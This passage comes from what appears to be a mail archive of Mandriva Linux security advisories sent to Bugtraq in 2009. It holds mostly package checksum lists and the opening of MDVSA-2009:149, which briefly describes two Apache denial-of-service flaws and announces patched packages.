 4c91c64f68bf7ee1381ba571363ff18b  corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.21.C30mdk.i586.rpm
 2e62901ddf70ec979ac1c31965817d5b  corporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.i586.rpm
 c98277bc893e194a4cfcc6ee2efddcb9  corporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.21.C30mdk.i586.rpm
 76a73eae916527a461e48f535ac92cff  corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.21.C30mdk.i586.rpm
 e2b217645c51bcecb6bade3230a2eda2  corporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.i586.rpm
 f0ba56775f6d0a1cdc99c897d0b0a619  corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.21.C30mdk.i586.rpm
 29e2b0644b85e489935f195334820f61  corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.21.C30mdk.i586.rpm
 77836bdb2fca0e05208e44dc7ad8742e  corporate/3.0/i586/apache2-modules-2.0.48-6.21.C30mdk.i586.rpm
 74ba9e4ba64d33c863919363ab295e62  corporate/3.0/i586/apache2-source-2.0.48-6.21.C30mdk.i586.rpm
 943e2a0c5fcff6dfc142ff52ba3286eb  corporate/3.0/i586/libapr0-2.0.48-6.21.C30mdk.i586.rpm 
 b7bdb08234711c39badc0dc000ca3d20  corporate/3.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 b857a73720d5645127010c91e039a630  corporate/3.0/x86_64/apache2-2.0.48-6.21.C30mdk.x86_64.rpm
 e6e5eca1cadb862b47804cc09a3bd2b4  corporate/3.0/x86_64/apache2-common-2.0.48-6.21.C30mdk.x86_64.rpm
 f99582e97f0987e4b0be6add27723183  corporate/3.0/x86_64/apache2-devel-2.0.48-6.21.C30mdk.x86_64.rpm
 44072cb59097737b3c00f5e8298ed89b  corporate/3.0/x86_64/apache2-manual-2.0.48-6.21.C30mdk.x86_64.rpm
 2d333f222f65952cae96754f7f21b604  corporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.21.C30mdk.x86_64.rpm
 0f5fa126d97dd1edc543a5b5de96c6e7  corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.21.C30mdk.x86_64.rpm
 555b2aedd6de7fb706995fb59fa6b4f3  corporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.21.C30mdk.x86_64.rpm
 1541273d263d9bda5e5eafeba7861e0c  corporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.x86_64.rpm
 295ef0b46ea5949fa0af116042936556  corporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.21.C30mdk.x86_64.rpm
 0dd4ae154c12f557a71448b5bdb42479  corporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.21.C30mdk.x86_64.rpm
 b93220ceeae20d88f4ae73182b9e72e6  corporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.x86_64.rpm
 97dc6100022a85442ac7dd7da01fae34  corporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.21.C30mdk.x86_64.rpm
 acb4b5e5955d42cca93d1ebec2328b23  corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.21.C30mdk.x86_64.rpm
 1af23190753541fe7d24f9bd85f57b1d  corporate/3.0/x86_64/apache2-modules-2.0.48-6.21.C30mdk.x86_64.rpm
 305ee3ac2af4c6ef4db046ecb3dd98ec  corporate/3.0/x86_64/apache2-source-2.0.48-6.21.C30mdk.x86_64.rpm
 e35e16fc12456a824a9e85dcfc9dbf0c  corporate/3.0/x86_64/lib64apr0-2.0.48-6.21.C30mdk.x86_64.rpm 
 b7bdb08234711c39badc0dc000ca3d20  corporate/3.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm

 Corporate 4.0:
 b9d526a415d82322c308912f97e4f1ae  corporate/4.0/i586/apache-base-2.2.3-1.7.20060mlcs4.i586.rpm
 a31613a66362403a6352d52047836e30  corporate/4.0/i586/apache-devel-2.2.3-1.7.20060mlcs4.i586.rpm
 dce72691c79bba01ee313fc378b36eb9  corporate/4.0/i586/apache-htcacheclean-2.2.3-1.7.20060mlcs4.i586.rpm
 b7937f4ef06f280f749c1fe5b7af10d2  corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.7.20060mlcs4.i586.rpm
 24ead4ff2d81737dcac9d625cdd5aaae  corporate/4.0/i586/apache-mod_cache-2.2.3-1.7.20060mlcs4.i586.rpm
 e1f31a31c845ef295ad5122a78ea3650  corporate/4.0/i586/apache-mod_dav-2.2.3-1.7.20060mlcs4.i586.rpm
 5ab10d768e463ae55838d347ec245102  corporate/4.0/i586/apache-mod_dbd-2.2.3-1.7.20060mlcs4.i586.rpm
 9b6b94cdeb55e147c7634297761990a0  corporate/4.0/i586/apache-mod_deflate-2.2.3-1.7.20060mlcs4.i586.rpm
 b1690a889bf2babfc911a2d600eb5081  corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.7.20060mlcs4.i586.rpm
 7f6bf2cfb1500cc55c3a195cc2b87a84  corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.7.20060mlcs4.i586.rpm
 6a57c241fab6d850ba46fc232132b2e0  corporate/4.0/i586/apache-mod_ldap-2.2.3-1.7.20060mlcs4.i586.rpm
 cf6a260d57b93c8e9bfe6fcbb97cb69a  corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.7.20060mlcs4.i586.rpm
 6a92e7840ff05818cca56ed1ee96df62  corporate/4.0/i586/apache-mod_proxy-2.2.3-1.7.20060mlcs4.i586.rpm
 f179ca37d885c3aaca4669a6173eb0c0  corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.7.20060mlcs4.i586.rpm
 52a7784816d6b4808a21e87990b40c70  corporate/4.0/i586/apache-mod_ssl-2.2.3-1.7.20060mlcs4.i586.rpm
 cdc4728fba27771d29728f1b1678d309  corporate/4.0/i586/apache-modules-2.2.3-1.7.20060mlcs4.i586.rpm
 cc4ca804e4fa51f7c4131ad16902ab9d  corporate/4.0/i586/apache-mod_userdir-2.2.3-1.7.20060mlcs4.i586.rpm
 bdee23bef1375ecbd47aeab1bdc9ed91  corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.7.20060mlcs4.i586.rpm
 449dfc068e06df184de8d36159b84765  corporate/4.0/i586/apache-mpm-worker-2.2.3-1.7.20060mlcs4.i586.rpm
 b5bd6a5ed078c35805b4ec2d9a788a79  corporate/4.0/i586/apache-source-2.2.3-1.7.20060mlcs4.i586.rpm 
 f206539ed9c3497f21f26a758d3403b4  corporate/4.0/SRPMS/apache-2.2.3-1.7.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 15ae114c8d2959ef5c6486029404f689  corporate/4.0/x86_64/apache-base-2.2.3-1.7.20060mlcs4.x86_64.rpm
 5198dcd3060de93577812740087fbc8d  corporate/4.0/x86_64/apache-devel-2.2.3-1.7.20060mlcs4.x86_64.rpm
 93d6afa11a57e157a53716ccf16cf0ef  corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.7.20060mlcs4.x86_64.rpm
 bc92cde6ea8b747d34f0a6ad5ac9e680  corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.7.20060mlcs4.x86_64.rpm
 7d08b4692a1e5ba32ffef6d734b96bcc  corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm
 87fc6d219c07f01a7f201f6bf413ff67  corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.7.20060mlcs4.x86_64.rpm
 feecfa18e01f0f03a262ea490fb0830f  corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.7.20060mlcs4.x86_64.rpm
 85a108666e4130d3a6b4fa0fed100aba  corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.7.20060mlcs4.x86_64.rpm
 a2d85bb6cd3d31c0d96f0fec454f2576  corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm
 e4027426a6dbfab2cb26e71266609ad3  corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm
 29df20ff497abe06723103fb5bdf5411  corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.7.20060mlcs4.x86_64.rpm
 fcae351832eaa3be0ee81bd1032a0ad2  corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm
 704b87767aa6fbb279cc8f755650af82  corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.7.20060mlcs4.x86_64.rpm
 544cf4f5cc0a9fafb62acb6808f44540  corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.7.20060mlcs4.x86_64.rpm
 b39cdcbc90bedfa443356c37451808c0  corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.7.20060mlcs4.x86_64.rpm
 f3d517adf5a4ce033d8d067fc6b14955  corporate/4.0/x86_64/apache-modules-2.2.3-1.7.20060mlcs4.x86_64.rpm
 c6c9c109cb6a41d52e702807e9704929  corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.7.20060mlcs4.x86_64.rpm
 3bf40c38ea6c6afb5d75b02e9425cbfc  corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.7.20060mlcs4.x86_64.rpm
 737c7f37638e53faf7cc269d6f197c2d  corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.7.20060mlcs4.x86_64.rpm
 9c793d83ccec6978fc1de8106ad05595  corporate/4.0/x86_64/apache-source-2.2.3-1.7.20060mlcs4.x86_64.rpm 
 f206539ed9c3497f21f26a758d3403b4  corporate/4.0/SRPMS/apache-2.2.3-1.7.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 55005338af9c4480caac9ffa86623264  mnf/2.0/i586/apache2-2.0.48-6.21.C30mdk.i586.rpm
 1263d183c09bcf57234a8f91de009e6b  mnf/2.0/i586/apache2-common-2.0.48-6.21.C30mdk.i586.rpm
 a5650d1b998d0e5b383d5ce47aa55433  mnf/2.0/i586/apache2-devel-2.0.48-6.21.C30mdk.i586.rpm
 d8b95b26cb53876fc299a64f1262b7db  mnf/2.0/i586/apache2-manual-2.0.48-6.21.C30mdk.i586.rpm
 69ac5aeed2fd42c52ce4f09fc5b70d62  mnf/2.0/i586/apache2-mod_cache-2.0.48-6.21.C30mdk.i586.rpm
 b6748d917602b92ea097129b317a5366  mnf/2.0/i586/apache2-mod_dav-2.0.48-6.21.C30mdk.i586.rpm
 950d5f9f1710a0b3f9071cd4adfaa28b  mnf/2.0/i586/apache2-mod_deflate-2.0.48-6.21.C30mdk.i586.rpm
 4885836db49da3bbcb31f1b1769c14d4  mnf/2.0/i586/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.i586.rpm
 cf58f6eb5f73b9ea4f9d11132cda42db  mnf/2.0/i586/apache2-mod_file_cache-2.0.48-6.21.C30mdk.i586.rpm
 06d5bb0f4c027b27642ff5c5eade19a2  mnf/2.0/i586/apache2-mod_ldap-2.0.48-6.21.C30mdk.i586.rpm
 4c76e76cea72d3449aceaf8ce91c6f44  mnf/2.0/i586/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.i586.rpm
 7b47e45702c799d496524b58b1128aaf  mnf/2.0/i586/apache2-mod_proxy-2.0.48-6.21.C30mdk.i586.rpm
 19f0e35da2f28563cb11136ea7dfeee7  mnf/2.0/i586/apache2-mod_ssl-2.0.48-6.21.C30mdk.i586.rpm
 940dbdedd9567b10414164a0d06e9898  mnf/2.0/i586/apache2-modules-2.0.48-6.21.C30mdk.i586.rpm
 3fac4349b9d5c061a0f83c16935eef8c  mnf/2.0/i586/apache2-source-2.0.48-6.21.C30mdk.i586.rpm
 1306a508a996ed429b1f022dca2890ec  mnf/2.0/i586/libapr0-2.0.48-6.21.C30mdk.i586.rpm 
 0640552aaad9af58f8f0dc97a2aaf6e9  mnf/2.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKVfgomqjQ0CJFipgRAuG7AJwNjHQS8BRukgf6jx7cwo7hVBjiFACgx/bp
cfmKStVOUmNQurlGpWWJe3I=g8pO
-----END PGP SIGNATURE-----

From - Mon Jul 13 18:03:27 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008b6b
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40814-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id BBB29ECF16
for <lists@securityspace.com>; Thu,  9 Jul 2009 14:58:07 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 5BECC236FCF; Thu,  9 Jul 2009 12:53:04 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12099 invoked from network); 9 Jul 2009 17:00:55 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:149 ] apache
Date: Thu, 09 Jul 2009 19:01:01 +0200
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1MOwzV-0002Iq-2H@titan.mandriva.com>
Status: RO


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:149
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : apache
 Date    : July 9, 2009
 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities has been found and corrected in apache:
 
 The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy
 module in the Apache HTTP Server before 2.3.3, when a reverse proxy
 is configured, does not properly handle an amount of streamed data
 that exceeds the Content-Length value, which allows remote attackers
 to cause a denial of service (CPU consumption) via crafted requests
 (CVE-2009-1890).
 
 Fix a potential Denial-of-Service attack against mod_deflate or other
 modules, by forcing the server to consume CPU time in compressing a
 large file after a client disconnects (CVE-2009-1891).
 
 This update provides fixes for these vulnerabilities.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1890
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1891
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.1:
 864257e773e8847901aa0f2e7b92e35c  2008.1/i586/apache-base-2.2.8-6.5mdv2008.1.i586.rpm
 2ef1924cb3803af418dcb0e12b05da5a  2008.1/i586/apache-devel-2.2.8-6.5mdv2008.1.i586.rpm
 a3ec4a3eda586d7b52e65e0dc715e96b  2008.1/i586/apache-htcacheclean-2.2.8-6.5mdv2008.1.i586.rpm
 ad46ee6bd081b35e89bf00b707e34e66  2008.1/i586/apache-mod_authn_dbd-2.2.8-6.5mdv2008.1.i586.rpm
 1500f492f8aa95f82ce8062fb79371bf  2008.1/i586/apache-mod_cache-2.2.8-6.5mdv2008.1.i586.rpm
 0bcf1f2cc7c220a5fcbe212e8d4c791a  2008.1/i586/apache-mod_dav-2.2.8-6.5mdv2008.1.i586.rpm
 f50830d873e8a948ebb7435068ac7723  2008.1/i586/apache-mod_dbd-2.2.8-6.5mdv2008.1.i586.rpm
 53e657db85cbbb5a46991b7a7e7ba6eb  2008.1/i586/apache-mod_deflate-2.2.8-6.5mdv2008.1.i586.rpm
 0de02351654d1691aca8027fcd162076  2008.1/i586/apache-mod_disk_cache-2.2.8-6.5mdv2008.1.i586.rpm
 9b8cb72ea384949d1afdb2a458edde43  2008.1/i586/apache-mod_file_cache-2.2.8-6.5mdv2008.1.i586.rpm
 b01299df82912bd055e8a4a5107f18ba  2008.1/i586/apache-mod_ldap-2.2.8-6.5mdv2008.1.i586.rpm
 de8b3be73e223946bc59267b2b061041  2008.1/i586/apache-mod_mem_cache-2.2.8-6.5mdv2008.1.i586.rpm
 f8d35075b25dfa8349e1a4903d17751b  2008.1/i586/apache-mod_proxy-2.2.8-6.5mdv2008.1.i586.rpm
 0c16a26c9c164197211a13c4ffcc3b33  2008.1/i586/apache-mod_proxy_ajp-2.2.8-6.5mdv2008.1.i586.rpm
 d70ff82e41072270e0f6af937d06ee9b  2008.1/i586/apache-mod_ssl-2.2.8-6.5mdv2008.1.i586.rpm
 05c16bce9cefcb99c1db3834f6853f89  2008.1/i586/apache-modules-2.2.8-6.5mdv2008.1.i586.rpm
 8e3ee38379f1e301a1e41a489a92147b  2008.1/i586/apache-mod_userdir-2.2.8-6.5mdv2008.1.i586.rpm
 a3ff073681b969b46638ff46a6313fc6  2008.1/i586/apache-mpm-event-2.2.8-6.5mdv2008.1.i586.rpm
 c89bb0192cc036054e3a4367fababce1  2008.1/i586/apache-mpm-itk-2.2.8-6.5mdv2008.1.i586.rpm
 410f034dd2818b264a09a036bd35f9a2  2008.1/i586/apache-mpm-prefork-2.2.8-6.5mdv2008.1.i586.rpm
 476303bf479cc1c249b6fa69f32742d2  2008.1/i586/apache-mpm-worker-2.2.8-6.5mdv2008.1.i586.rpm
 23ef5826c0e49f577d8d04254f61a923  2008.1/i586/apache-source-2.2.8-6.5mdv2008.1.i586.rpm 
 5d895c7c364db08fff0372c3654d1ccd  2008.1/SRPMS/apache-2.2.8-6.5mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 ed8541532eb77b813ec71f35bc3b1a7f  2008.1/x86_64/apache-base-2.2.8-6.5mdv2008.1.x86_64.rpm
 98000923f5eec7c767dafd94ab0967bc  2008.1/x86_64/apache-devel-2.2.8-6.5mdv2008.1.x86_64.rpm
 7c81d6ed41e96370e3c4498a6a082714  2008.1/x86_64/apache-htcacheclean-2.2.8-6.5mdv2008.1.x86_64.rpm
 074ce4664eb6fc96f0444de96bdd17cf  2008.1/x86_64/apache-mod_authn_dbd-2.2.8-6.5mdv2008.1.x86_64.rpm
 8306c6084cabfd7e36207a53489093df  2008.1/x86_64/apache-mod_cache-2.2.8-6.5mdv2008.1.x86_64.rpm
 eaf9d071b93a0f478e242253b031c2bd  2008.1/x86_64/apache-mod_dav-2.2.8-6.5mdv2008.1.x86_64.rpm
 d02221dbdac77e5fa1ee1710f5e946dd  2008.1/x86_64/apache-mod_dbd-2.2.8-6.5mdv2008.1.x86_64.rpm
 574bb4b1e11c16210e99be0ce029aa10  2008.1/x86_64/apache-mod_deflate-2.2.8-6.5mdv2008.1.x86_64.rpm
 c3196491613788da66c222dfd1d7608e  2008.1/x86_64/apache-mod_disk_cache-2.2.8-6.5mdv2008.1.x86_64.rpm
 9eeb2a7b68bc178dc7917c362d89b5ff  2008.1/x86_64/apache-mod_file_cache-2.2.8-6.5mdv2008.1.x86_64.rpm
 5dfc3a189d4e70dde834a84c3a5141fa  2008.1/x86_64/apache-mod_ldap-2.2.8-6.5mdv2008.1.x86_64.rpm
 66696247e7ae1a919e0e80fa43544b92  2008.1/x86_64/apache-mod_mem_cache-2.2.8-6.5mdv2008.1.x86_64.rpm
 6374972abfd91ab03fe74ac0b9b5fbbd  2008.1/x86_64/apache-mod_proxy-2.2.8-6.5mdv2008.1.x86_64.rpm
 6606ff6d4ae5d09716a69938e2b944c6  2008.1/x86_64/apache-mod_proxy_ajp-2.2.8-6.5mdv2008.1.x86_64.rpm
 23ba0203d6876a376e1a1e22e887b54c  2008.1/x86_64/apache-mod_ssl-2.2.8-6.5mdv2008.1.x86_64.rpm
 b7077a42c6b823d7a744e5ecbe306242  2008.1/x86_64/apache-modules-2.2.8-6.5mdv2008.1.x86_64.rpm
 fa1ab5a1c4190191c88fb83bf07d3926  2008.1/x86_64/apache-mod_userdir-2.2.8-6.5mdv2008.1.x86_64.rpm
 abb9e82feea59e2d913dab61c0c1be2f  2008.1/x86_64/apache-mpm-event-2.2.8-6.5mdv2008.1.x86_64.rpm
 a7e021179bcabb2e6725d7488fac33cf  2008.1/x86_64/apache-mpm-itk-2.2.8-6.5mdv2008.1.x86_64.rpm
 64ec4ecc7f6f6557eb95ba61017e00a8  2008.1/x86_64/apache-mpm-prefork-2.2.8-6.5mdv2008.1.x86_64.rpm
 5955bfd23bfff88bea08d049bbf1ff88  2008.1/x86_64/apache-mpm-worker-2.2.8-6.5mdv2008.1.x86_64.rpm
 91e233e5e4874e2beaa6eff728d1a8df  2008.1/x86_64/apache-source-2.2.8-6.5mdv2008.1.x86_64.rpm 
 5d895c7c364db08fff0372c3654d1ccd  2008.1/SRPMS/apache-2.2.8-6.5mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 d363852286bffcc1f16be74529c16d8e  2009.0/i586/apache-base-2.2.9-12.3mdv2009.0.i586.rpm
 5958b4410e39655375a3fb06704e86cb  2009.0/i586/apache-devel-2.2.9-12.3mdv2009.0.i586.rpm
 0d57fe115977bdb79f5550f68e6f0a7c  2009.0/i586/apache-htcacheclean-2.2.9-12.3mdv2009.0.i586.rpm
 4d3907f8abc34e0398d2a67df9185f1e  2009.0/i586/apache-mod_authn_dbd-2.2.9-12.3mdv2009.0.i586.rpm
 3cf8641644943ef13cff4b6af29cfacb  2009.0/i586/apache-mod_cache-2.2.9-12.3mdv2009.0.i586.rpm
 8adb06cd1b0c1364c30c761c49b50d33  2009.0/i586/apache-mod_dav-2.2.9-12.3mdv2009.0.i586.rpm
 a0bfc1e6a7d9f8862c65c69f759cd093  2009.0/i586/apache-mod_dbd-2.2.9-12.3mdv2009.0.i586.rpm
 b335c39fe37988f3de26537262dd6b9d  2009.0/i586/apache-mod_deflate-2.2.9-12.3mdv2009.0.i586.rpm
 f3e11730ca6381f782f60ea7ad703b33  2009.0/i586/apache-mod_disk_cache-2.2.9-12.3mdv2009.0.i586.rpm
 8ec10efb81f40dd11e744856a30f1a9e  2009.0/i586/apache-mod_file_cache-2.2.9-12.3mdv2009.0.i586.rpm
 ca822b5f7ce60c3b2e8ac8ef9c87ea07  2009.0/i586/apache-mod_ldap-2.2.9-12.3mdv2009.0.i586.rpm
 6ef2fe37d9056fd08fe10f17f72eb131  2009.0/i586/apache-mod_mem_cache-2.2.9-12.3mdv2009.0.i586.rpm
 17e4a0cb1a25f1a1dd34d64527cd69ff  2009.0/i586/apache-mod_proxy-2.2.9-12.3mdv2009.0.i586.rpm
 f757375865df48bde5fde177bc53f176  2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.3mdv2009.0.i586.rpm
 afa87773aa3485eb3d08482f6c66b723  2009.0/i586/apache-mod_ssl-2.2.9-12.3mdv2009.0.i586.rpm
 b9b4cebe20f782cf6d61de932ae775fe  2009.0/i586/apache-modules-2.2.9-12.3mdv2009.0.i586.rpm
 7caa399d860dce728c05e2a1bbb37b02  2009.0/i586/apache-mod_userdir-2.2.9-12.3mdv2009.0.i586.rpm
 991dcf92749cedff7f2b7ea110cbc26d  2009.0/i586/apache-mpm-event-2.2.9-12.3mdv2009.0.i586.rpm
 6631e8492a2cfb0c294a844d4437896b  2009.0/i586/apache-mpm-itk-2.2.9-12.3mdv2009.0.i586.rpm
 334050ac21bee98ba6cb3275f378c07f  2009.0/i586/apache-mpm-peruser-2.2.9-12.3mdv2009.0.i586.rpm
 616f75510fbf462edf494fdf6456f2f0  2009.0/i586/apache-mpm-prefork-2.2.9-12.3mdv2009.0.i586.rpm
 ec4bc21290ccb97b3f4a89fe395f961e  2009.0/i586/apache-mpm-worker-2.2.9-12.3mdv2009.0.i586.rpm
 fd5db56435be568aa94e4f256f083640  2009.0/i586/apache-source-2.2.9-12.3mdv2009.0.i586.rpm 
 befd4b86100340246045938e9668b133  2009.0/SRPMS/apache-2.2.9-12.3mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 12bb10b4fefbe9a41290619b396bbc27  2009.0/x86_64/apache-base-2.2.9-12.3mdv2009.0.x86_64.rpm
 f9480a489f5fc7bf6f09601c66786166  2009.0/x86_64/apache-devel-2.2.9-12.3mdv2009.0.x86_64.rpm
 194e19c4192104e1ce86ccae92bc3678  2009.0/x86_64/apache-htcacheclean-2.2.9-12.3mdv2009.0.x86_64.rpm
 83df7eff4ccf56a27dfab4b7e5e55def  2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.3mdv2009.0.x86_64.rpm
 7e17cd33c2f77598a55b27de9a1f272f  2009.0/x86_64/apache-mod_cache-2.2.9-12.3mdv2009.0.x86_64.rpm
 49b4f14a69e1fe814892d8c1235fff3b  2009.0/x86_64/apache-mod_dav-2.2.9-12.3mdv2009.0.x86_64.rpm
 51bf4942dcdfce90ca8d921fcf721d20  2009.0/x86_64/apache-mod_dbd-2.2.9-12.3mdv2009.0.x86_64.rpm
 1b95ecf1dd6d8509d764428c2f64f023  2009.0/x86_64/apache-mod_deflate-2.2.9-12.3mdv2009.0.x86_64.rpm
 2a269581f79f4261357d78c3a32f5ac9  2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.3mdv2009.0.x86_64.rpm
 b471904247a8663f8894956b02bd3095  2009.0/x86_64/apache-mod_file_cache-2.2.9-12.3mdv2009.0.x86_64.rpm
 2f9667e46b23c991813607a53310e5d8  2009.0/x86_64/apache-mod_ldap-2.2.9-12.3mdv2009.0.x86_64.rpm
 184b807180f72d4399a4039f6f08d7d8  2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.3mdv2009.0.x86_64.rpm
 cfc41078bac18b0512a44756eb31c727  2009.0/x86_64/apache-mod_proxy-2.2.9-12.3mdv2009.0.x86_64.rpm
 4d7e1318e9ca104dce782997d94734f3  2009.0/x86_64/apache-mod_proxy_ajp-2.2.9-12.3mdv2009.0.x86_64.rpm
 d3613cf215e1617d53761395591c0ee5  2009.0/x86_64/apache-mod_ssl-2.2.9-12.3mdv2009.0.x86_64.rpm
 663d9a17a0a131c46ad70aebb9d286a1  2009.0/x86_64/apache-modules-2.2.9-12.3mdv2009.0.x86_64.rpm
 4b88b69bb42109d60ed86b3aa0cf6cf0  2009.0/x86_64/apache-mod_userdir-2.2.9-12.3mdv2009.0.x86_64.rpm
 c0212892e5ccc905bf9c8c27c0fc55a4  2009.0/x86_64/apache-mpm-event-2.2.9-12.3mdv2009.0.x86_64.rpm
 845a766d32686438a04562898d658f66  2009.0/x86_64/apache-mpm-itk-2.2.9-12.3mdv2009.0.x86_64.rpm
 d841f9b7e7898e99f16ecc668a829890  2009.0/x86_64/apache-mpm-peruser-2.2.9-12.3mdv2009.0.x86_64.rpm
 55bb3d32f6ad363872d9c27e6eab04a6  2009.0/x86_64/apache-mpm-prefork-2.2.9-12.3mdv2009.0.x86_64.rpm
 2ace6623bedb6f5d29d8b79505361ef1  2009.0/x86_64/apache-mpm-worker-2.2.9-12.3mdv2009.0.x86_64.rpm
 aa3f27740d94b8d2ada54592b3c1deb2  2009.0/x86_64/apache-source-2.2.9-12.3mdv2009.0.x86_64.rpm 
 befd4b86100340246045938e9668b133  2009.0/SRPMS/apache-2.2.9-12.3mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 43de323093117584b6f981e3440893d9  2009.1/i586/apache-base-2.2.11-10.4mdv2009.1.i586.rpm
 e4a751411c51ebf3db63c5a70ba555ee  2009.1/i586/apache-devel-2.2.11-10.4mdv2009.1.i586.rpm
 b013be5a696f29cdd2c0c6da0799dd08  2009.1/i586/apache-htcacheclean-2.2.11-10.4mdv2009.1.i586.rpm
 672318a22cff862b606d6f1721650a9b  2009.1/i586/apache-mod_authn_dbd-2.2.11-10.4mdv2009.1.i586.rpm
 cd318fc1bf8be7106f1c92f0e23f2faa  2009.1/i586/apache-mod_cache-2.2.11-10.4mdv2009.1.i586.rpm
 f8354758215da0db366c942bde4465fe  2009.1/i586/apache-mod_dav-2.2.11-10.4mdv2009.1.i586.rpm
 d04f091350b5737c35217b3963cdba21  2009.1/i586/apache-mod_dbd-2.2.11-10.4mdv2009.1.i586.rpm
 94ba7bfec4c32d194a157ae285cbfbe6  2009.1/i586/apache-mod_deflate-2.2.11-10.4mdv2009.1.i586.rpm
 fed83efa0e9315b5f6060535424046fd  2009.1/i586/apache-mod_disk_cache-2.2.11-10.4mdv2009.1.i586.rpm
 1b9b91a3a25036edfebe5bcd7f603fd5  2009.1/i586/apache-mod_file_cache-2.2.11-10.4mdv2009.1.i586.rpm
 f9b090f9e1d5303171884ef6972232e7  2009.1/i586/apache-mod_ldap-2.2.11-10.4mdv2009.1.i586.rpm
 7af5d73ac41cf7d8f54251e0d14a6eed  2009.1/i586/apache-mod_mem_cache-2.2.11-10.4mdv2009.1.i586.rpm
